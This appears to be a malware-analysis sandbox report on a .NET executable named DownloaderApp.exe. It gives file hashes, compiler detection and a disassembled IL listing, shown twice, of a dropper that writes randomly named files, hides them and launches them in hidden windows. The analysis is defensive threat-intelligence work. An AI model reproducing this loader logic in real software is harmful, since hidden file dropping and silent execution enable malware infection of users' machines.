4b4e3520f6127c1c65fdd8b3ecac975e

PE Executable
|
MD5: 4b4e3520f6127c1c65fdd8b3ecac975e
|
Size: 4.4 MB
|
application/x-dosexec

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	4b4e3520f6127c1c65fdd8b3ecac975e
Sha1	bbc427f63445d9fa65fb10859ac83720fc147e8e
Sha256	3a88fc89c7e42d6865ac32b65091fbe0c4940b4661c80a57d1c85980d76b8a50
Sha384	36a1953c2e7c230d59f027ee95e721ec1d5a64cb56a334fad41122edc4c453151907b958ab360e9aa490948bb959eec9
Sha512	0bc6bf3b2439bbe0c4fc5dde8783edcee0ac67672fe8dd19d1f0a2c3426c4f04c8292a3e40b79ab8997d70aea5598b483f3d1229907b7dfc94489a95a40eedaa
SSDeep	98304:FW+GNNftT3R4w3K6tZSaMSs1eJMn7w08BKAqffmj:Dkb2w3E16MiBrUfm
TLSH	D11622107D56C032D56251B21F79EBF285BDBC21AB3149DB77C01E36AA211E2AA31F39

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual C++ 6.0 DLL (Debug)

Microsoft Visual C++ 7.0 - 8.0

Microsoft Visual C++ v6.0 DLL

Microsoft Visual Studio .NET

File Structure

Informations

Name0	Value
Info	PE Detect: PeReader OK (file layout)
Module Name	DownloaderApp.exe
Full Name	DownloaderApp.exe
EntryPoint	System.Void ::(System.String[])
Scope Name	DownloaderApp.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	DownloaderApp
Assembly Version	1.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.7.2
Total Strings	0
Main Method	System.Void ::(System.String[])
Main IL Instruction Count	279
Main IL	call System.Boolean System.Environment::get_UserInteractive() brtrue.s IL_0012: ldc.i4.s 10 newobj System.Void ::.ctor() call System.Void System.ServiceProcess.ServiceBase::Run(System.ServiceProcess.ServiceBase) ret <null> ldc.i4.s 10 newarr System.String dup <null> ldc.i4.0 <null> ldc.i4 935970925 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.1 <null> ldc.i4 935970931 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.2 <null> ldc.i4 935970904 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.3 <null> ldc.i4 935970851 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.4 <null> ldc.i4 935970824 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.5 <null> ldc.i4 935970832 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.6 <null> ldc.i4 935971046 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.7 <null> ldc.i4 935971022 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.8 <null> ldc.i4 935970985 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.s 9 ldc.i4 935971007 call System.String ::(System.Int32) stelem.ref <null> stloc.s V_9 ldc.i4.s 10 newarr System.String dup <null> ldc.i4.0 <null> ldc.i4 935970969 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.1 <null> ldc.i4 935971174 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.2 <null> ldc.i4 935971141 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.3 <null> ldc.i4 935971104 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.4 <null> ldc.i4 935971073 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.5 <null> ldc.i4 935971308 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.6 <null> ldc.i4 935971273 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.7 <null> ldc.i4 935971240 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.8 <null> ldc.i4 935971252 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.s 9 ldc.i4 935971218 call System.String ::(System.Int32) stelem.ref <null> stloc.s V_5 newobj System.Void System.Random::.ctor() stloc.2 <null> ldloc.s V_9 newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor(System.Collections.Generic.IEnumerable`1<System.String>) stloc.0 <null> ldloc.0 <null> ldloc.2 <null> ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_6 ldloc.0 <null> ldloc.s V_6 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.0 <null> ldloc.2 <null> ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_7 ldloc.0 <null> ldloc.s V_7 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.0 <null> ldloc.2 <null> ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_8 ldloc.0 <null> ldloc.s V_8 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.s V_5 ldloc.2 <null> ldloc.s V_5 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> stloc.s V_10 ldc.i4.s 16 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) dup <null> ldloc.s V_6 call System.String System.IO.Path::Combine(System.String,System.String) stloc.1 <null> dup <null> ldloc.s V_7 call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.s V_8 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldc.i4 935971452 call System.String ::(System.Int32) ldloc.1 <null> call System.Void ::(System.String,System.String) ldc.i4 935971423 call System.String ::(System.Int32) ldloc.3 <null> call System.Void ::(System.String,System.String) ldc.i4 935971390 call System.String ::(System.Int32) ldloc.s V_4 call System.Void ::(System.String,System.String) ldloc.1 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.3 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_4 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.1 <null> call System.Void ::(System.String) ldloc.3 <null> call System.Void ::(System.String) ldloc.s V_4 call System.Void ::(System.String) call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() call System.Void ::(System.String) ldloc.1 <null> ldloc.s V_10 call System.Void ::(System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldc.i4 935971345 call System.String ::(System.Int32) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4 935971567 call System.String ::(System.Int32) ldloc.1 <null> ldc.i4 935971571 call System.String ::(System.Int32) call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldc.i4 935971345 call System.String ::(System.Int32) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4 935971567 call System.String ::(System.Int32) ldloc.3 <null> ldc.i4 935971571 call System.String ::(System.Int32) call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldc.i4 935971345 call System.String ::(System.Int32) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4 935971567 call System.String ::(System.Int32) ldloc.s V_4 ldc.i4 935971571 call System.String ::(System.Int32) call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave.s IL_0327: ret pop <null> leave.s IL_0327: ret ret <null>
Module Name	DownloaderApp.exe
Full Name	DownloaderApp.exe
EntryPoint	System.Void ::(System.String[])
Scope Name	DownloaderApp.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	DownloaderApp
Assembly Version	1.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.7.2
Total Strings	0
Main Method	System.Void ::(System.String[])
Main IL Instruction Count	279
Main IL	call System.Boolean System.Environment::get_UserInteractive() brtrue.s IL_0012: ldc.i4.s 10 newobj System.Void ::.ctor() call System.Void System.ServiceProcess.ServiceBase::Run(System.ServiceProcess.ServiceBase) ret <null> ldc.i4.s 10 newarr System.String dup <null> ldc.i4.0 <null> ldc.i4 935970925 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.1 <null> ldc.i4 935970931 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.2 <null> ldc.i4 935970904 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.3 <null> ldc.i4 935970851 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.4 <null> ldc.i4 935970824 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.5 <null> ldc.i4 935970832 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.6 <null> ldc.i4 935971046 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.7 <null> ldc.i4 935971022 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.8 <null> ldc.i4 935970985 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.s 9 ldc.i4 935971007 call System.String ::(System.Int32) stelem.ref <null> stloc.s V_9 ldc.i4.s 10 newarr System.String dup <null> ldc.i4.0 <null> ldc.i4 935970969 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.1 <null> ldc.i4 935971174 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.2 <null> ldc.i4 935971141 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.3 <null> ldc.i4 935971104 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.4 <null> ldc.i4 935971073 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.5 <null> ldc.i4 935971308 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.6 <null> ldc.i4 935971273 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.7 <null> ldc.i4 935971240 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.8 <null> ldc.i4 935971252 call System.String ::(System.Int32) stelem.ref <null> dup <null> ldc.i4.s 9 ldc.i4 935971218 call System.String ::(System.Int32) stelem.ref <null> stloc.s V_5 newobj System.Void System.Random::.ctor() stloc.2 <null> ldloc.s V_9 newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor(System.Collections.Generic.IEnumerable`1<System.String>) stloc.0 <null> ldloc.0 <null> ldloc.2 <null> ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_6 ldloc.0 <null> ldloc.s V_6 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.0 <null> ldloc.2 <null> ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_7 ldloc.0 <null> ldloc.s V_7 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.0 <null> ldloc.2 <null> ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_8 ldloc.0 <null> ldloc.s V_8 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.s V_5 ldloc.2 <null> ldloc.s V_5 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> stloc.s V_10 ldc.i4.s 16 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) dup <null> ldloc.s V_6 call System.String System.IO.Path::Combine(System.String,System.String) stloc.1 <null> dup <null> ldloc.s V_7 call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.s V_8 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldc.i4 935971452 call System.String ::(System.Int32) ldloc.1 <null> call System.Void ::(System.String,System.String) ldc.i4 935971423 call System.String ::(System.Int32) ldloc.3 <null> call System.Void ::(System.String,System.String) ldc.i4 935971390 call System.String ::(System.Int32) ldloc.s V_4 call System.Void ::(System.String,System.String) ldloc.1 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.3 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_4 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.1 <null> call System.Void ::(System.String) ldloc.3 <null> call System.Void ::(System.String) ldloc.s V_4 call System.Void ::(System.String) call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() call System.Void ::(System.String) ldloc.1 <null> ldloc.s V_10 call System.Void ::(System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldc.i4 935971345 call System.String ::(System.Int32) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4 935971567 call System.String ::(System.Int32) ldloc.1 <null> ldc.i4 935971571 call System.String ::(System.Int32) call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldc.i4 935971345 call System.String ::(System.Int32) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4 935971567 call System.String ::(System.Int32) ldloc.3 <null> ldc.i4 935971571 call System.String ::(System.Int32) call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldc.i4 935971345 call System.String ::(System.Int32) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4 935971567 call System.String ::(System.Int32) ldloc.s V_4 ldc.i4 935971571 call System.String ::(System.Int32) call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave.s IL_0327: ret pop <null> leave.s IL_0327: ret ret <null>

4b4e3520f6127c1c65fdd8b3ecac975e (4.4 MB)

File Structure

Characteristics

No malware configuration were found at this point.

You must be signed in to post a comment.

4b4e3520f6127c1c65fdd8b3ecac975e

PE Executable | MD5: 4b4e3520f6127c1c65fdd8b3ecac975e | Size: 4.4 MB | application/x-dosexec

PE Executable
|
MD5: 4b4e3520f6127c1c65fdd8b3ecac975e
|
Size: 4.4 MB
|
application/x-dosexec